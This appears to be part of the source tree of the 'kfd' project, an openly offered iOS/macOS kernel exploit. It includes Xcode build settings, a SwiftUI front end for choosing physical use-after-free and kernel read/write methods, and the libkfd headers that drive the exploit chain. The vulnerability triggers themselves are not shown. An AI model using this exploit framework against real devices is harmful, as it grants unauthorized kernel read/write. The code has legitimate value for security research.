CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES; 356 | CLANG_WARN_BOOL_CONVERSION = YES; 357 | CLANG_WARN_COMMA = YES; 358 | CLANG_WARN_CONSTANT_CONVERSION = YES; 359 | CLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS = YES; 360 | CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR; 361 | CLANG_WARN_DOCUMENTATION_COMMENTS = YES; 362 | CLANG_WARN_EMPTY_BODY = YES; 363 | CLANG_WARN_ENUM_CONVERSION = YES; 364 | CLANG_WARN_INFINITE_RECURSION = YES; 365 | CLANG_WARN_INT_CONVERSION = YES; 366 | CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES; 367 | CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF = YES; 368 | CLANG_WARN_OBJC_LITERAL_CONVERSION = YES; 369 | CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR; 370 | CLANG_WARN_QUOTED_INCLUDE_IN_FRAMEWORK_HEADER = YES; 371 | CLANG_WARN_RANGE_LOOP_ANALYSIS = YES; 372 | CLANG_WARN_STRICT_PROTOTYPES = YES; 373 | CLANG_WARN_SUSPICIOUS_MOVE = YES; 374 | CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE; 375 | CLANG_WARN_UNREACHABLE_CODE = YES; 376 | CLANG_WARN__DUPLICATE_METHOD_MATCH = YES; 377 | COPY_PHASE_STRIP = NO; 378 | DEBUG_INFORMATION_FORMAT = "dwarf-with-dsym"; 379 | ENABLE_NS_ASSERTIONS = NO; 380 | ENABLE_STRICT_OBJC_MSGSEND = YES; 381 | GCC_C_LANGUAGE_STANDARD = gnu11; 382 | GCC_NO_COMMON_BLOCKS = YES; 383 | GCC_WARN_64_TO_32_BIT_CONVERSION = YES; 384 | GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR; 385 | GCC_WARN_UNDECLARED_SELECTOR = YES; 386 | GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE; 387 | GCC_WARN_UNUSED_FUNCTION = YES; 388 | GCC_WARN_UNUSED_VARIABLE = YES; 389 | MTL_ENABLE_DEBUG_INFO = NO; 390 | MTL_FAST_MATH = YES; 391 | SWIFT_COMPILATION_MODE = wholemodule; 392 | SWIFT_OPTIMIZATION_LEVEL = "-O"; 393 | }; 394 | name = Release; 395 | }; 396 | 297BA1152A310AE200D1E51A /* Debug */ = { 397 | isa = XCBuildConfiguration; 398 | buildSettings = { 399 | ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; 400 | ASSETCATALOG_COMPILER_GLOBAL_ACCENT_COLOR_NAME = AccentColor; 401 | CLANG_ENABLE_MODULES = YES; 402 | CODE_SIGN_ENTITLEMENTS = kfd/kfd.entitlements; 403 | CODE_SIGN_STYLE = Automatic; 404 | CURRENT_PROJECT_VERSION = 1; 405 | DEVELOPMENT_ASSET_PATHS = "\"kfd/Preview Content\""; 406 | DEVELOPMENT_TEAM = 4YW3B9LRX5; 407 | ENABLE_HARDENED_RUNTIME = YES; 408 | ENABLE_PREVIEWS = YES; 409 | GENERATE_INFOPLIST_FILE = YES; 410 | "INFOPLIST_KEY_UIApplicationSceneManifest_Generation[sdk=iphoneos*]" = YES; 411 | "INFOPLIST_KEY_UIApplicationSceneManifest_Generation[sdk=iphonesimulator*]" = YES; 412 | "INFOPLIST_KEY_UIApplicationSupportsIndirectInputEvents[sdk=iphoneos*]" = YES; 413 | "INFOPLIST_KEY_UIApplicationSupportsIndirectInputEvents[sdk=iphonesimulator*]" = YES; 414 | "INFOPLIST_KEY_UILaunchScreen_Generation[sdk=iphoneos*]" = YES; 415 | "INFOPLIST_KEY_UILaunchScreen_Generation[sdk=iphonesimulator*]" = YES; 416 | "INFOPLIST_KEY_UIStatusBarStyle[sdk=iphoneos*]" = UIStatusBarStyleDefault; 417 | "INFOPLIST_KEY_UIStatusBarStyle[sdk=iphonesimulator*]" = UIStatusBarStyleDefault; 418 | INFOPLIST_KEY_UISupportedInterfaceOrientations_iPad = "UIInterfaceOrientationPortrait UIInterfaceOrientationPortraitUpsideDown UIInterfaceOrientationLandscapeLeft UIInterfaceOrientationLandscapeRight"; 419 | INFOPLIST_KEY_UISupportedInterfaceOrientations_iPhone = "UIInterfaceOrientationPortrait UIInterfaceOrientationLandscapeLeft UIInterfaceOrientationLandscapeRight"; 420 | IPHONEOS_DEPLOYMENT_TARGET = 16.4; 421 | LD_RUNPATH_SEARCH_PATHS = "@executable_path/Frameworks"; 422 | "LD_RUNPATH_SEARCH_PATHS[sdk=macosx*]" = "@executable_path/../Frameworks"; 423 | MACOSX_DEPLOYMENT_TARGET = 13.3; 424 | MARKETING_VERSION = 1.0; 425 | PRODUCT_BUNDLE_IDENTIFIER = com.p0up0u.kfd; 426 | PRODUCT_NAME = "$(TARGET_NAME)"; 427 | SDKROOT = auto; 428 | SUPPORTED_PLATFORMS = "iphoneos iphonesimulator macosx"; 429 | SWIFT_EMIT_LOC_STRINGS = YES; 430 | SWIFT_OBJC_BRIDGING_HEADER = "kfd/kfd-Bridging-Header.h"; 431 | SWIFT_OPTIMIZATION_LEVEL = "-Onone"; 432 | SWIFT_VERSION = 5.0; 433 | TARGETED_DEVICE_FAMILY = "1,2"; 434 | }; 435 | name = Debug; 436 | }; 437 | 297BA1162A310AE200D1E51A /* Release */ = { 438 | isa = XCBuildConfiguration; 439 | buildSettings = { 440 | ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; 441 | ASSETCATALOG_COMPILER_GLOBAL_ACCENT_COLOR_NAME = AccentColor; 442 | CLANG_ENABLE_MODULES = YES; 443 | CODE_SIGN_ENTITLEMENTS = kfd/kfd.entitlements; 444 | CODE_SIGN_STYLE = Automatic; 445 | CURRENT_PROJECT_VERSION = 1; 446 | DEVELOPMENT_ASSET_PATHS = "\"kfd/Preview Content\""; 447 | DEVELOPMENT_TEAM = 4YW3B9LRX5; 448 | ENABLE_HARDENED_RUNTIME = YES; 449 | ENABLE_PREVIEWS = YES; 450 | GENERATE_INFOPLIST_FILE = YES; 451 | "INFOPLIST_KEY_UIApplicationSceneManifest_Generation[sdk=iphoneos*]" = YES; 452 | "INFOPLIST_KEY_UIApplicationSceneManifest_Generation[sdk=iphonesimulator*]" = YES; 453 | "INFOPLIST_KEY_UIApplicationSupportsIndirectInputEvents[sdk=iphoneos*]" = YES; 454 | "INFOPLIST_KEY_UIApplicationSupportsIndirectInputEvents[sdk=iphonesimulator*]" = YES; 455 | "INFOPLIST_KEY_UILaunchScreen_Generation[sdk=iphoneos*]" = YES; 456 | "INFOPLIST_KEY_UILaunchScreen_Generation[sdk=iphonesimulator*]" = YES; 457 | "INFOPLIST_KEY_UIStatusBarStyle[sdk=iphoneos*]" = UIStatusBarStyleDefault; 458 | "INFOPLIST_KEY_UIStatusBarStyle[sdk=iphonesimulator*]" = UIStatusBarStyleDefault; 459 | INFOPLIST_KEY_UISupportedInterfaceOrientations_iPad = "UIInterfaceOrientationPortrait UIInterfaceOrientationPortraitUpsideDown UIInterfaceOrientationLandscapeLeft UIInterfaceOrientationLandscapeRight"; 460 | INFOPLIST_KEY_UISupportedInterfaceOrientations_iPhone = "UIInterfaceOrientationPortrait UIInterfaceOrientationLandscapeLeft UIInterfaceOrientationLandscapeRight"; 461 | IPHONEOS_DEPLOYMENT_TARGET = 16.4; 462 | LD_RUNPATH_SEARCH_PATHS = "@executable_path/Frameworks"; 463 | "LD_RUNPATH_SEARCH_PATHS[sdk=macosx*]" = "@executable_path/../Frameworks"; 464 | MACOSX_DEPLOYMENT_TARGET = 13.3; 465 | MARKETING_VERSION = 1.0; 466 | PRODUCT_BUNDLE_IDENTIFIER = com.p0up0u.kfd; 467 | PRODUCT_NAME = "$(TARGET_NAME)"; 468 | SDKROOT = auto; 469 | SUPPORTED_PLATFORMS = "iphoneos iphonesimulator macosx"; 470 | SWIFT_EMIT_LOC_STRINGS = YES; 471 | SWIFT_OBJC_BRIDGING_HEADER = "kfd/kfd-Bridging-Header.h"; 472 | SWIFT_VERSION = 5.0; 473 | TARGETED_DEVICE_FAMILY = "1,2"; 474 | }; 475 | name = Release; 476 | }; 477 | /* End XCBuildConfiguration section */ 478 | 479 | /* Begin XCConfigurationList section */ 480 | 297BA1002A310AE100D1E51A /* Build configuration list for PBXProject "kfd" */ = { 481 | isa = XCConfigurationList; 482 | buildConfigurations = ( 483 | 297BA1122A310AE200D1E51A /* Debug */, 484 | 297BA1132A310AE200D1E51A /* Release */, 485 | ); 486 | defaultConfigurationIsVisible = 0; 487 | defaultConfigurationName = Release; 488 | }; 489 | 297BA1142A310AE200D1E51A /* Build configuration list for PBXNativeTarget "kfd" */ = { 490 | isa = XCConfigurationList; 491 | buildConfigurations = ( 492 | 297BA1152A310AE200D1E51A /* Debug */, 493 | 297BA1162A310AE200D1E51A /* Release */, 494 | ); 495 | defaultConfigurationIsVisible = 0; 496 | defaultConfigurationName = Release; 497 | }; 498 | /* End XCConfigurationList section */ 499 | }; 500 | rootObject = 297BA0FD2A310AE100D1E51A /* Project object */; 501 | } 502 | -------------------------------------------------------------------------------- /kfd.xcodeproj/project.xcworkspace/contents.xcworkspacedata: -------------------------------------------------------------------------------- 1 | 2 | 4 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /kfd.xcodeproj/project.xcworkspace/xcshareddata/IDEWorkspaceChecks.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | IDEDidComputeMac32BitWarning 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /kfd/Assets.xcassets/AccentColor.colorset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "colors" : [ 3 | { 4 | "idiom" : "universal" 5 | } 6 | ], 7 | "info" : { 8 | "author" : "xcode", 9 | "version" : 1 10 | } 11 | } 12 | -------------------------------------------------------------------------------- /kfd/Assets.xcassets/AppIcon.appiconset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "idiom" : "universal", 5 | "platform" : "ios", 6 | "size" : "1024x1024" 7 | }, 8 | { 9 | "idiom" : "mac", 10 | "scale" : "1x", 11 | "size" : "16x16" 12 | }, 13 | { 14 | "idiom" : "mac", 15 | "scale" : "2x", 16 | "size" : "16x16" 17 | }, 18 | { 19 | "idiom" : "mac", 20 | "scale" : "1x", 21 | "size" : "32x32" 22 | }, 23 | { 24 | "idiom" : "mac", 25 | "scale" : "2x", 26 | "size" : "32x32" 27 | }, 28 | { 29 | "idiom" : "mac", 30 | "scale" : "1x", 31 | "size" : "128x128" 32 | }, 33 | { 34 | "idiom" : "mac", 35 | "scale" : "2x", 36 | "size" : "128x128" 37 | }, 38 | { 39 | "idiom" : "mac", 40 | "scale" : "1x", 41 | "size" : "256x256" 42 | }, 43 | { 44 | "idiom" : "mac", 45 | "scale" : "2x", 46 | "size" : "256x256" 47 | }, 48 | { 49 | "idiom" : "mac", 50 | "scale" : "1x", 51 | "size" : "512x512" 52 | }, 53 | { 54 | "idiom" : "mac", 55 | "scale" : "2x", 56 | "size" : "512x512" 57 | } 58 | ], 59 | "info" : { 60 | "author" : "xcode", 61 | "version" : 1 62 | } 63 | } 64 | -------------------------------------------------------------------------------- /kfd/Assets.xcassets/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "info" : { 3 | "author" : "xcode", 4 | "version" : 1 5 | } 6 | } 7 | -------------------------------------------------------------------------------- /kfd/ContentView.swift: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. 3 | */ 4 | 5 | import SwiftUI 6 | 7 | struct ContentView: View { 8 | @State private var kfd: UInt64 = 0 9 | 10 | private var puaf_pages_options = [16, 32, 64, 128, 256, 512, 1024, 2048] 11 | @State private var puaf_pages_index = 7 12 | @State private var puaf_pages = 0 13 | 14 | private var puaf_method_options = ["physpuppet", "smith"] 15 | @State private var puaf_method = 1 16 | 17 | private var kread_method_options = ["kqueue_workloop_ctl", "sem_open"] 18 | @State private var kread_method = 1 19 | 20 | private var kwrite_method_options = ["dup", "sem_open"] 21 | @State private var kwrite_method = 1 22 | 23 | var body: some View { 24 | NavigationView { 25 | Form { 26 | Section { 27 | Picker(selection: $puaf_pages_index, label: Text("puaf pages:")) { 28 | ForEach(0 ..< puaf_pages_options.count, id: \.self) { 29 | Text(String(self.puaf_pages_options[$0])) 30 | } 31 | }.disabled(kfd != 0) 32 | } 33 | Section { 34 | Picker(selection: $puaf_method, label: Text("puaf method:")) { 35 | ForEach(0 ..< puaf_method_options.count, id: \.self) { 36 | Text(self.puaf_method_options[$0]) 37 | } 38 | }.disabled(kfd != 0) 39 | } 40 | Section { 41 | Picker(selection: $kread_method, label: Text("kread method:")) { 42 | ForEach(0 ..< kread_method_options.count, id: \.self) { 43 | Text(self.kread_method_options[$0]) 44 | } 45 | }.disabled(kfd != 0) 46 | } 47 | Section { 48 | Picker(selection: $kwrite_method, label: Text("kwrite method:")) { 49 | ForEach(0 ..< kwrite_method_options.count, id: \.self) { 50 | Text(self.kwrite_method_options[$0]) 51 | } 52 | }.disabled(kfd != 0) 53 | } 54 | Section { 55 | HStack { 56 | Button("kopen") { 57 | puaf_pages = puaf_pages_options[puaf_pages_index] 58 | kfd = kopen(UInt64(puaf_pages), UInt64(puaf_method), UInt64(kread_method), UInt64(kwrite_method)) 59 | }.disabled(kfd != 0).frame(minWidth: 0, maxWidth: .infinity) 60 | Button("kclose") { 61 | kclose(kfd) 62 | puaf_pages = 0 63 | kfd = 0 64 | }.disabled(kfd == 0).frame(minWidth: 0, maxWidth: .infinity) 65 | }.buttonStyle(.bordered) 66 | }.listRowBackground(Color.clear) 67 | if kfd != 0 { 68 | Section { 69 | VStack { 70 | Text("Success!").foregroundColor(.green) 71 | Text("Look at output in Xcode") 72 | }.frame(minWidth: 0, maxWidth: .infinity) 73 | }.listRowBackground(Color.clear) 74 | } 75 | }.navigationBarTitle(Text("kfd"), displayMode: .inline) 76 | } 77 | } 78 | } 79 | 80 | struct ContentView_Previews: PreviewProvider { 81 | static var previews: some View { 82 | ContentView() 83 | } 84 | } 85 | -------------------------------------------------------------------------------- /kfd/Preview Content/Preview Assets.xcassets/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "info" : { 3 | "author" : "xcode", 4 | "version" : 1 5 | } 6 | } 7 | -------------------------------------------------------------------------------- /kfd/kfd-Bridging-Header.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. 3 | */ 4 | 5 | #include "libkfd.h" 6 | -------------------------------------------------------------------------------- /kfd/kfd.entitlements: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | com.apple.security.app-sandbox 6 | 7 | com.apple.security.files.user-selected.read-only 8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /kfd/kfdApp.swift: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. 3 | */ 4 | 5 | import SwiftUI 6 | 7 | @main 8 | struct kfdApp: App { 9 | var body: some Scene { 10 | WindowGroup { 11 | ContentView() 12 | } 13 | } 14 | } 15 | -------------------------------------------------------------------------------- /kfd/libkfd.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. 3 | */ 4 | 5 | #ifndef libkfd_h 6 | #define libkfd_h 7 | 8 | /* 9 | * The global configuration parameters of libkfd. 10 | */ 11 | #define CONFIG_ASSERT 1 12 | #define CONFIG_PRINT 1 13 | #define CONFIG_TIMER 1 14 | 15 | #include "libkfd/common.h" 16 | 17 | /* 18 | * The public API of libkfd. 19 | */ 20 | 21 | enum puaf_method { 22 | puaf_physpuppet, 23 | puaf_smith, 24 | }; 25 | 26 | enum kread_method { 27 | kread_kqueue_workloop_ctl, 28 | kread_sem_open, 29 | }; 30 | 31 | enum kwrite_method { 32 | kwrite_dup, 33 | kwrite_sem_open, 34 | }; 35 | 36 | u64 kopen(u64 puaf_pages, u64 puaf_method, u64 kread_method, u64 kwrite_method); 37 | void kread(u64 kfd, u64 kaddr, void* uaddr, u64 size); 38 | void kwrite(u64 kfd, void* uaddr, u64 kaddr, u64 size); 39 | void kclose(u64 kfd); 40 | 41 | /* 42 | * The private API of libkfd. 43 | */ 44 | 45 | struct kfd; // Forward declaration for function pointers. 46 | 47 | struct info { 48 | struct { 49 | vm_address_t src_uaddr; 50 | vm_address_t dst_uaddr; 51 | vm_size_t size; 52 | } copy; 53 | struct { 54 | i32 pid; 55 | u64 tid; 56 | u64 vid; 57 | bool ios; 58 | char osversion[8]; 59 | u64 maxfilesperproc; 60 | } env; 61 | struct { 62 | u64 current_map; 63 | u64 current_pmap; 64 | u64 current_proc; 65 | u64 current_task; 66 | u64 current_thread; 67 | u64 current_uthread; 68 | u64 kernel_map; 69 | u64 kernel_pmap; 70 | u64 kernel_proc; 71 | u64 kernel_task; 72 | } kaddr; 73 | }; 74 | 75 | struct perf { 76 | u64 kernelcache_index; 77 | u64 kernel_slide; 78 | u64 gVirtBase; 79 | u64 gPhysBase; 80 | u64 gPhysSize; 81 | struct { 82 | u64 pa; 83 | u64 va; 84 | } ttbr[2]; 85 | struct ptov_table_entry { 86 | u64 pa; 87 | u64 va; 88 | u64 len; 89 | } ptov_table[8]; 90 | struct { 91 | u64 kaddr; 92 | u64 paddr; 93 | u64 uaddr; 94 | u64 size; 95 | } shared_page; 96 | struct { 97 | i32 fd; 98 | u32 si_rdev_buffer[2]; 99 | u64 si_rdev_kaddr; 100 | } dev; 101 | void (*saved_kread)(struct kfd*, u64, void*, u64); 102 | void (*saved_kwrite)(struct kfd*, void*, u64, u64); 103 | }; 104 | 105 | struct puaf { 106 | u64 number_of_puaf_pages; 107 | u64* puaf_pages_uaddr; 108 | void* puaf_method_data; 109 | u64 puaf_method_data_size; 110 | struct { 111 | void (*init)(struct kfd*); 112 | void (*run)(struct kfd*); 113 | void (*cleanup)(struct kfd*); 114 | void (*free)(struct kfd*); 115 | } puaf_method_ops; 116 | }; 117 | 118 | struct krkw { 119 | u64 krkw_maximum_id; 120 | u64 krkw_allocated_id; 121 | u64 krkw_searched_id; 122 | u64 krkw_object_id; 123 | u64 krkw_object_uaddr; 124 | u64 krkw_object_size; 125 | void* krkw_method_data; 126 | u64 krkw_method_data_size; 127 | struct { 128 | void (*init)(struct kfd*); 129 | void (*allocate)(struct kfd*, u64); 130 | bool (*search)(struct kfd*, u64); 131 | void (*kread)(struct kfd*, u64, void*, u64); 132 | void (*kwrite)(struct kfd*, void*, u64, u64); 133 | void (*find_proc)(struct kfd*); 134 | void (*deallocate)(struct kfd*, u64); 135 | void (*free)(struct kfd*); 136 | } krkw_method_ops; 137 | }; 138 | 139 | struct kfd { 140 | struct info info; 141 | struct perf perf; 142 | struct puaf puaf; 143 | struct krkw kread; 144 | struct krkw kwrite; 145 | }; 146 | 147 | #include "libkfd/info.h" 148 | #include "libkfd/puaf.h" 149 | #include "libkfd/krkw.h" 150 | #include "libkfd/perf.h" 151 | 152 | struct kfd* kfd_init(u64 puaf_pages, u64 puaf_method, u64 kread_method, u64 kwrite_method) 153 | { 154 | struct kfd* kfd = (struct kfd*)(malloc_bzero(sizeof(struct kfd))); 155 | info_init(kfd); 156 | puaf_init(kfd, puaf_pages, puaf_method); 157 | krkw_init(kfd, kread_method, kwrite_method); 158 | perf_init(kfd); 159 | return kfd; 160 | } 161 | 162 | void kfd_free(struct kfd* kfd) 163 | { 164 | perf_free(kfd); 165 | krkw_free(kfd); 166 | puaf_free(kfd); 167 | info_free(kfd); 168 | bzero_free(kfd, sizeof(struct kfd)); 169 | } 170 | 171 | u64 kopen(u64 puaf_pages, u64 puaf_method, u64 kread_method, u64 kwrite_method) 172 | { 173 | timer_start(); 174 | 175 | const u64 puaf_pages_min = 16; 176 | const u64 puaf_pages_max = 2048; 177 | assert(puaf_pages >= puaf_pages_min); 178 | assert(puaf_pages <= puaf_pages_max); 179 | assert(puaf_method <= puaf_smith); 180 | assert(kread_method <= kread_sem_open); 181 | assert(kwrite_method <= kwrite_sem_open); 182 | 183 | struct kfd* kfd = kfd_init(puaf_pages, puaf_method, kread_method, kwrite_method); 184 | puaf_run(kfd); 185 | krkw_run(kfd); 186 | info_run(kfd); 187 | perf_run(kfd); 188 | puaf_cleanup(kfd); 189 | 190 | timer_end(); 191 | return (u64)(kfd); 192 | } 193 | 194 | void kread(u64 kfd, u64 kaddr, void* uaddr, u64 size) 195 | { 196 | krkw_kread((struct kfd*)(kfd), kaddr, uaddr, size); 197 | } 198 | 199 | void kwrite(u64 kfd, void* uaddr, u64 kaddr, u64 size) 200 | { 201 | krkw_kwrite((struct kfd*)(kfd), uaddr, kaddr, size); 202 | } 203 | 204 | void kclose(u64 kfd) 205 | { 206 | kfd_free((struct kfd*)(kfd)); 207 | } 208 | 209 | #endif /* libkfd_h */ 210 | -------------------------------------------------------------------------------- /kfd/libkfd/common.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. 3 | */ 4 | 5 | #ifndef common_h 6 | #define common_h 7 | 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | 22 | #define pages(number_of_pages) ((number_of_pages) * (16384ull)) 23 | 24 | #define min(a, b) (((a) < (b)) ? (a) : (b)) 25 | #define max(a, b) (((a) > (b)) ? (a) : (b)) 26 | 27 | typedef int8_t i8; 28 | typedef int16_t i16; 29 | typedef int32_t i32; 30 | typedef int64_t i64; 31 | typedef intptr_t isize; 32 | 33 | typedef uint8_t u8; 34 | typedef uint16_t u16; 35 | typedef uint32_t u32; 36 | typedef uint64_t u64; 37 | typedef uintptr_t usize; 38 | 39 | /* 40 | * Helper print macros. 41 | */ 42 | 43 | #if CONFIG_PRINT 44 | 45 | #define print(args...) printf(args) 46 | 47 | #else /* CONFIG_PRINT */ 48 | 49 | #define print(args...) 50 | 51 | #endif /* CONFIG_PRINT */ 52 | 53 | #define print_bool(name) print("[%s]: %s = %s\n", __FUNCTION__, #name, name ? "true" : "false") 54 | 55 | #define print_i8(name) print("[%s]: %s = %hhi\n", __FUNCTION__, #name, name) 56 | #define print_u8(name) print("[%s]: %s = %hhu\n", __FUNCTION__, #name, name) 57 | #define print_x8(name) print("[%s]: %s = %02hhx\n", __FUNCTION__, #name, name) 58 | 59 | #define print_i16(name) print("[%s]: %s = %hi\n", __FUNCTION__, #name, name) 60 | #define print_u16(name) print("[%s]: %s = %hu\n", __FUNCTION__, #name, name) 61 | #define print_x16(name) print("[%s]: %s = %04hx\n", __FUNCTION__, #name, name) 62 | 63 | #define print_i32(name) print("[%s]: %s = %i\n", __FUNCTION__, #name, name) 64 | #define print_u32(name) print("[%s]: %s = %u\n", __FUNCTION__, #name, name) 65 | #define print_x32(name) print("[%s]: %s = %08x\n", __FUNCTION__, #name, name) 66 | 67 | #define print_i64(name) print("[%s]: %s = %lli\n", __FUNCTION__, #name, name) 68 | #define print_u64(name) print("[%s]: %s = %llu\n", __FUNCTION__, #name, name) 69 | #define print_x64(name) print("[%s]: %s = %016llx\n", __FUNCTION__, #name, name) 70 | 71 | #define print_isize(name) print("[%s]: %s = %li\n", __FUNCTION__, #name, name) 72 | #define print_usize(name) print("[%s]: %s = %lu\n", __FUNCTION__, #name, name) 73 | #define print_xsize(name) print("[%s]: %s = %016lx\n", __FUNCTION__, #name, name) 74 | 75 | #define print_string(name) print("[%s]: %s = %s\n", __FUNCTION__, #name, name) 76 | 77 | #define print_message(args...) do { print("[%s]: ", __FUNCTION__); print(args); print("\n"); } while (0) 78 | #define print_success(args...) do { print("[%s]: 🟢 ", __FUNCTION__); print(args); print("\n"); } while (0) 79 | #define print_warning(args...) do { print("[%s]: 🟡 ", __FUNCTION__); print(args); print("\n"); } while (0) 80 | #define print_failure(args...) do { print("[%s]: 🔴 ", __FUNCTION__); print(args); print("\n"); } while (0) 81 | 82 | #define print_timer(tv) \ 83 | do { \ 84 | u64 sec = ((tv)->tv_sec); \ 85 | u64 msec = ((tv)->tv_usec) / 1000; \ 86 | u64 usec = ((tv)->tv_usec) % 1000; \ 87 | print_success("%llus %llums %lluus", sec, msec, usec); \ 88 | } while (0) 89 | 90 | #define print_buffer(uaddr, size) \ 91 | do { \ 92 | const u64 u64_per_line = 8; \ 93 | volatile u64* u64_base = (volatile u64*)(uaddr); \ 94 | u64 u64_size = ((u64)(size) / sizeof(u64)); \ 95 | for (u64 u64_offset = 0; u64_offset < u64_size; u64_offset++) { \ 96 | if ((u64_offset % u64_per_line) == 0) { \ 97 | print("[0x%04llx]: ", u64_offset * sizeof(u64)); \ 98 | } \ 99 | print("%016llx", u64_base[u64_offset]); \ 100 | if ((u64_offset % u64_per_line) == (u64_per_line - 1)) { \ 101 | print("\n"); \ 102 | } else { \ 103 | print(" "); \ 104 | } \ 105 | } \ 106 | if ((u64_size % u64_per_line) != 0) { \ 107 | print("\n"); \ 108 | } \ 109 | } while (0) 110 | 111 | /* 112 | * Helper assert macros. 113 | */ 114 | 115 | #if CONFIG_ASSERT 116 | 117 | #define assert(condition) \ 118 | do { \ 119 | if (!(condition)) { \ 120 | print_failure("assertion failed: (%s)", #condition); \ 121 | print_failure("file: %s, line: %d", __FILE__, __LINE__); \ 122 | print_failure("... sleep(30) before exit(1) ..."); \ 123 | sleep(30); \ 124 | exit(1); \ 125 | } \ 126 | } while (0) 127 | 128 | #else /* CONFIG_ASSERT */ 129 | 130 | #define assert(condition) 131 | 132 | #endif /* CONFIG_ASSERT */ 133 | 134 | #define assert_false(message) \ 135 | do { \ 136 | print_failure("error: %s", message); \ 137 | assert(false); \ 138 | } while (0) 139 | 140 | #define assert_bsd(statement) \ 141 | do { \ 142 | kern_return_t kret = (statement); \ 143 | if (kret != KERN_SUCCESS) { \ 144 | print_failure("bsd error: kret = %d, errno = %d (%s)", kret, errno, strerror(errno)); \ 145 | assert(kret == KERN_SUCCESS); \ 146 | } \ 147 | } while (0) 148 | 149 | #define assert_mach(statement) \ 150 | do { \ 151 | kern_return_t kret = (statement); \ 152 | if (kret != KERN_SUCCESS) { \ 153 | print_failure("mach error: kret = %d (%s)", kret, mach_error_string(kret)); \ 154 | assert(kret == KERN_SUCCESS); \ 155 | } \ 156 | } while (0) 157 | 158 | /* 159 | * Helper timer macros. 160 | */ 161 | 162 | #if CONFIG_TIMER 163 | 164 | #define timer_start() \ 165 | struct timeval tv_start; \ 166 | do { \ 167 | assert_bsd(gettimeofday(&tv_start, NULL)); \ 168 | } while (0) 169 | 170 | #define timer_end() \ 171 | do { \ 172 | struct timeval tv_end, tv_diff; \ 173 | assert_bsd(gettimeofday(&tv_end, NULL)); \ 174 | timersub(&tv_end, &tv_start, &tv_diff); \ 175 | print_timer(&tv_diff); \ 176 | } while (0) 177 | 178 | #else /* CONFIG_TIMER */ 179 | 180 | #define timer_start() 181 | #define timer_end() 182 | 183 | #endif /* CONFIG_TIMER */ 184 | 185 | /* 186 | * Helper allocation macros. 187 | */ 188 | 189 | #define malloc_bzero(size) \ 190 | ({ \ 191 | void* pointer = malloc(size); \ 192 | assert(pointer != NULL); \ 193 | bzero(pointer, size); \ 194 | pointer; \ 195 | }) 196 | 197 | #define bzero_free(pointer, size) \ 198 | do { \ 199 | bzero(pointer, size); \ 200 | free(pointer); \ 201 | pointer = NULL; \ 202 | } while (0) 203 | 204 | #endif /* common_h */ 205 | -------------------------------------------------------------------------------- /kfd/libkfd/info.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. 3 | */ 4 | 5 | #ifndef info_h 6 | #define info_h 7 | 8 | /* 9 | * Helper macros for dynamic types. 10 | */ 11 | 12 | #define dynamic_sizeof(object) (object##_versions[kfd->info.env.vid].object_size) 13 | 14 | #define dynamic_offsetof(object, field) (object##_versions[kfd->info.env.vid].field) 15 | 16 | #define dynamic_uget(object, field, object_uaddr) \ 17 | ({ \ 18 | u64 field_uaddr = (u64)(object_uaddr) + dynamic_offsetof(object, field); \ 19 | object##_##field##_t field_value = *(volatile object##_##field##_t*)(field_uaddr); \ 20 | field_value; \ 21 | }) 22 | 23 | #define dynamic_uset(object, field, object_uaddr, field_value) \ 24 | do { \ 25 | u64 field_uaddr = (u64)(object_uaddr) + dynamic_offsetof(object, field); \ 26 | *(volatile object##_##field##_t*)(field_uaddr) = (object##_##field##_t)(field_value); \ 27 | } while (0) 28 | 29 | #define dynamic_kget(object, field, object_kaddr) \ 30 | ({ \ 31 | u64 buffer = 0; \ 32 | u64 field_kaddr = (u64)(object_kaddr) + dynamic_offsetof(object, field); \ 33 | kread((u64)(kfd), (field_kaddr), (&buffer), (sizeof(buffer))); \ 34 | object##_##field##_t field_value = *(object##_##field##_t*)(&buffer); \ 35 | field_value; \ 36 | }) 37 | 38 | #define dynamic_kset_u64(object, field, object_kaddr, field_value) \ 39 | do { \ 40 | u64 buffer = field_value; \ 41 | u64 field_kaddr = (u64)(object_kaddr) + dynamic_offsetof(object, field); \ 42 | kwrite((u64)(kfd), (&buffer), (field_kaddr), (sizeof(buffer))); \ 43 | } while (0) 44 | 45 | #include "info/dynamic_types/kqworkloop.h" 46 | #include "info/dynamic_types/proc.h" 47 | #include "info/dynamic_types/task.h" 48 | #include "info/dynamic_types/thread.h" 49 | #include "info/dynamic_types/uthread.h" 50 | #include "info/dynamic_types/vm_map.h" 51 | 52 | /* 53 | * Helper macros for static types. 54 | */ 55 | 56 | #define static_sizeof(object) (sizeof(struct object)) 57 | 58 | #define static_offsetof(object, 